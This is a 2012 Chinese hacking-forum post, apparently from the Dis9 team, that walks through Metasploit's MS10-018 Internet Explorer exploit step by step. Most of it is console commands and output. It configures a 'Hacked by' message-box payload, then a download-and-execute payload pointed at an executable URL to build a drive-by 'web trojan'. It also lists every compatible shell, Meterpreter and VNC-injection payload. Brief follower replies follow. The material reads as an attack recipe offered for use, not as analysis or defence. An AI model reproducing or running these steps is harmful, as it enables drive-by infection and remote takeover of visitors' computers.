切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
10 Metasploit的PAYLOAD[复制链接]
发表于 2012-8-4 11:52:43 | 显示全部楼层 |!read_mode!
PAYLOAD是啥子? 就是SHELLCODE,就是METASPLOIT的后门方式,正对WINDOWS LINUX等等都用

最长用的是:
windows/meterpreter/reverse_tcp
我们来换一个,我要他弹窗: Hacked By Dis9 Team
打开UB1 XP2 1
exploit/windows/browser/ms10_018_ie_behaviors来做演示
  1. msf > use exploit/windows/browser/ms10_018_ie_behaviors
  2. msf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/messagebox
  3. PAYLOAD => windows/messagebox
  4. msf  exploit(ms10_018_ie_behaviors) > show options

  5. Module options (exploit/windows/browser/ms10_018_ie_behaviors):

  6.    Name        Current Setting  Required  Description
  7.    ----        ---------------  --------  -----------
  8.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  9.    SRVPORT     8080             yes       The local port to listen on.
  10.    SSL         false            no        Negotiate SSL for incoming connections
  11.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  12.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  13.    URIPATH     /                no        The URI to use for this exploit (default is random)

  14. Payload options (windows/messagebox):

  15.    Name      Current Setting   Required  Description
  16.    ----      ---------------   --------  -----------
  17.    EXITFUNC  process           yes       Exit technique: seh, thread, process, none
  18.    ICON      NO                yes       Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
  19.    TEXT      Hello, from MSF!  yes       Messagebox Text (max 255 chars)
  20.    TITLE     MessageBox        yes       Messagebox Title (max 255 chars)

  21. Exploit target:

  22.    Id  Name
  23.    --  ----
  24.    0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

  25. msf  exploit(ms10_018_ie_behaviors) >
复制代码
写如的是: windows/messagebox
我们来写入信息
  1. msf  exploit(ms10_018_ie_behaviors) > set TEXT Hacked by Dis9Team
  2. TEXT => Hacked by Dis9Team
  3. msf  exploit(ms10_018_ie_behaviors) > set TITLE www.dis9.com
  4. TITLE => www.dis9.com
  5. msf  exploit(ms10_018_ie_behaviors) >
复制代码
生成网马
  1. msf  exploit(ms10_018_ie_behaviors) > exploit
  2. [*] Exploit running as background job.

  3. [*] Using URL: http://0.0.0.0:8080/
  4. [*]  Local IP: http://5.5.5.5:8080/
  5. [*] Server started.
  6. msf  exploit(ms10_018_ie_behaviors) >
复制代码
访问后:

如果我要生成网马呢?先吧监听杀死
  1. msf  exploit(ms10_018_ie_behaviors) > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   0   Exploit: windows/browser/ms10_018_ie_behaviors

  7. msf  exploit(ms10_018_ie_behaviors) > kill 0
  8. Stopping job: 0...

  9. [*] Server stopped.
  10. [*] Server stopped.
  11. msf  exploit(ms10_018_ie_behaviors) >
复制代码
生成自己的网马
  1. msf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/download_exec
  2. PAYLOAD => windows/download_exec
  3. msf  exploit(ms10_018_ie_behaviors) > set URL http://www.baidu.com/exe.exe
  4. URL => http://www.baidu.com/exe.exe
  5. msf  exploit(ms10_018_ie_behaviors) > exploit -j
  6. [*] Exploit running as background job.

  7. [*] Using URL: http://0.0.0.0:8080/
  8. [*]  Local IP: http://5.5.5.5:8080/
  9. [*] Server started.
  10. msf  exploit(ms10_018_ie_behaviors) >
复制代码
查看全部PAYLOAD:
  1. msf  exploit(ms10_018_ie_behaviors) > show payloads

  2. Compatible Payloads
  3. ===================

  4.    Name                                             Disclosure Date  Rank    Description
  5.    ----                                             ---------------  ----    -----------
  6.    generic/custom                                                    normal  Custom Payload
  7.    generic/debug_trap                                                normal  Generic x86 Debug Trap
  8.    generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
  9.    generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
  10.    generic/tight_loop                                                normal  Generic x86 Tight Loop
  11.    windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
  12.    windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
  13.    windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
  14.    windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, Reverse HTTP Stager
  15.    windows/dllinject/reverse_ipv6_http                               normal  Reflective Dll Injection, Reverse HTTP Stager (IPv6)
  16.    windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
  17.    windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
  18.    windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
  19.    windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
  20.    windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
  21.    windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
  22.    windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
  23.    windows/download_exec                                             normal  Windows Executable Download and Execute
  24.    windows/download_exec_https                                       normal  Windows Executable Download (http,https,ftp) and Execute
  25.    windows/exec                                                      normal  Windows Execute Command
  26.    windows/loadlibrary                                               normal  Windows LoadLibrary Path
  27.    windows/messagebox                                                normal  Windows MessageBox
  28.    windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
  29.    windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
  30.    windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
  31.    windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
  32.    windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
  33.    windows/meterpreter/reverse_ipv6_http                             normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
  34.    windows/meterpreter/reverse_ipv6_https                            normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
  35.    windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
  36.    windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
  37.    windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
  38.    windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
  39.    windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
  40.    windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
  41.    windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
  42.    windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
  43.    windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
  44.    windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
  45.    windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
  46.    windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
  47.    windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
  48.    windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
  49.    windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
  50.    windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
  51.    windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
  52.    windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
  53.    windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
  54.    windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
  55.    windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
  56.    windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
  57.    windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
  58.    windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
  59.    windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
  60.    windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
  61.    windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
  62.    windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
  63.    windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
  64.    windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
  65.    windows/shell/reverse_ipv6_http                                   normal  Windows Command Shell, Reverse HTTP Stager (IPv6)
  66.    windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
  67.    windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
  68.    windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
  69.    windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
  70.    windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
  71.    windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
  72.    windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
  73.    windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
  74.    windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
  75.    windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
  76.    windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
  77.    windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
  78.    windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
  79.    windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
  80.    windows/upexec/reverse_ipv6_http                                  normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)
  81.    windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
  82.    windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
  83.    windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
  84.    windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
  85.    windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
  86.    windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
  87.    windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
  88.    windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
  89.    windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
  90.    windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
  91.    windows/vncinject/reverse_ipv6_http                               normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
  92.    windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
  93.    windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
  94.    windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
  95.    windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
  96.    windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
  97.    windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

  98. msf  exploit(ms10_018_ie_behaviors) >
复制代码
查看PAYLOAD介绍:
  1. msf  exploit(ms10_018_ie_behaviors) > info windows/vncinject/reverse_tcp_dns

  2.        Name: VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
  3.      Module: payload/windows/vncinject/reverse_tcp_dns
  4.     Version: 14976, 12600, 14976
  5.    Platform: Windows
  6.        Arch: x86
  7. Needs Admin: No
  8. Total size: 367
  9.        Rank: Normal

  10. Provided by:
  11.   sf
  12.   hdm
  13.   skape

  14. Basic options:
  15. Name      Current Setting  Required  Description
  16. ----      ---------------  --------  -----------
  17. AUTOVNC   true             yes       Automatically launch VNC viewer if present
  18. EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  19. LHOST     5.5.5.5          yes       The DNS hostname to connect back to
  20. LPORT     4444             yes       The listen port
  21. VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
  22. VNCPORT   5900             yes       The local port to use for the VNC proxy

  23. Description:
  24.   Connect back to the attacker, Inject a VNC Dll via a reflective
  25.   loader (staged)

  26. msf  exploit(ms10_018_ie_behaviors) >
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2015-3-15 09:13:49 | 显示全部楼层
霸气测漏
发表于 2015-6-6 17:01:16 | 显示全部楼层
insidesec 发表于 2015-3-15 09:13
霸气测漏

“酱油党”不可浏览主题与回复内容
    发自己擅长的技术贴到 论坛事务版块,合格后将恢复身份
发表于 2015-6-9 21:08:11 | 显示全部楼层
学习了
发表于 2015-10-23 13:59:02 | 显示全部楼层
学习了

代码区

GMT+8, 2020-10-25 06:55

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部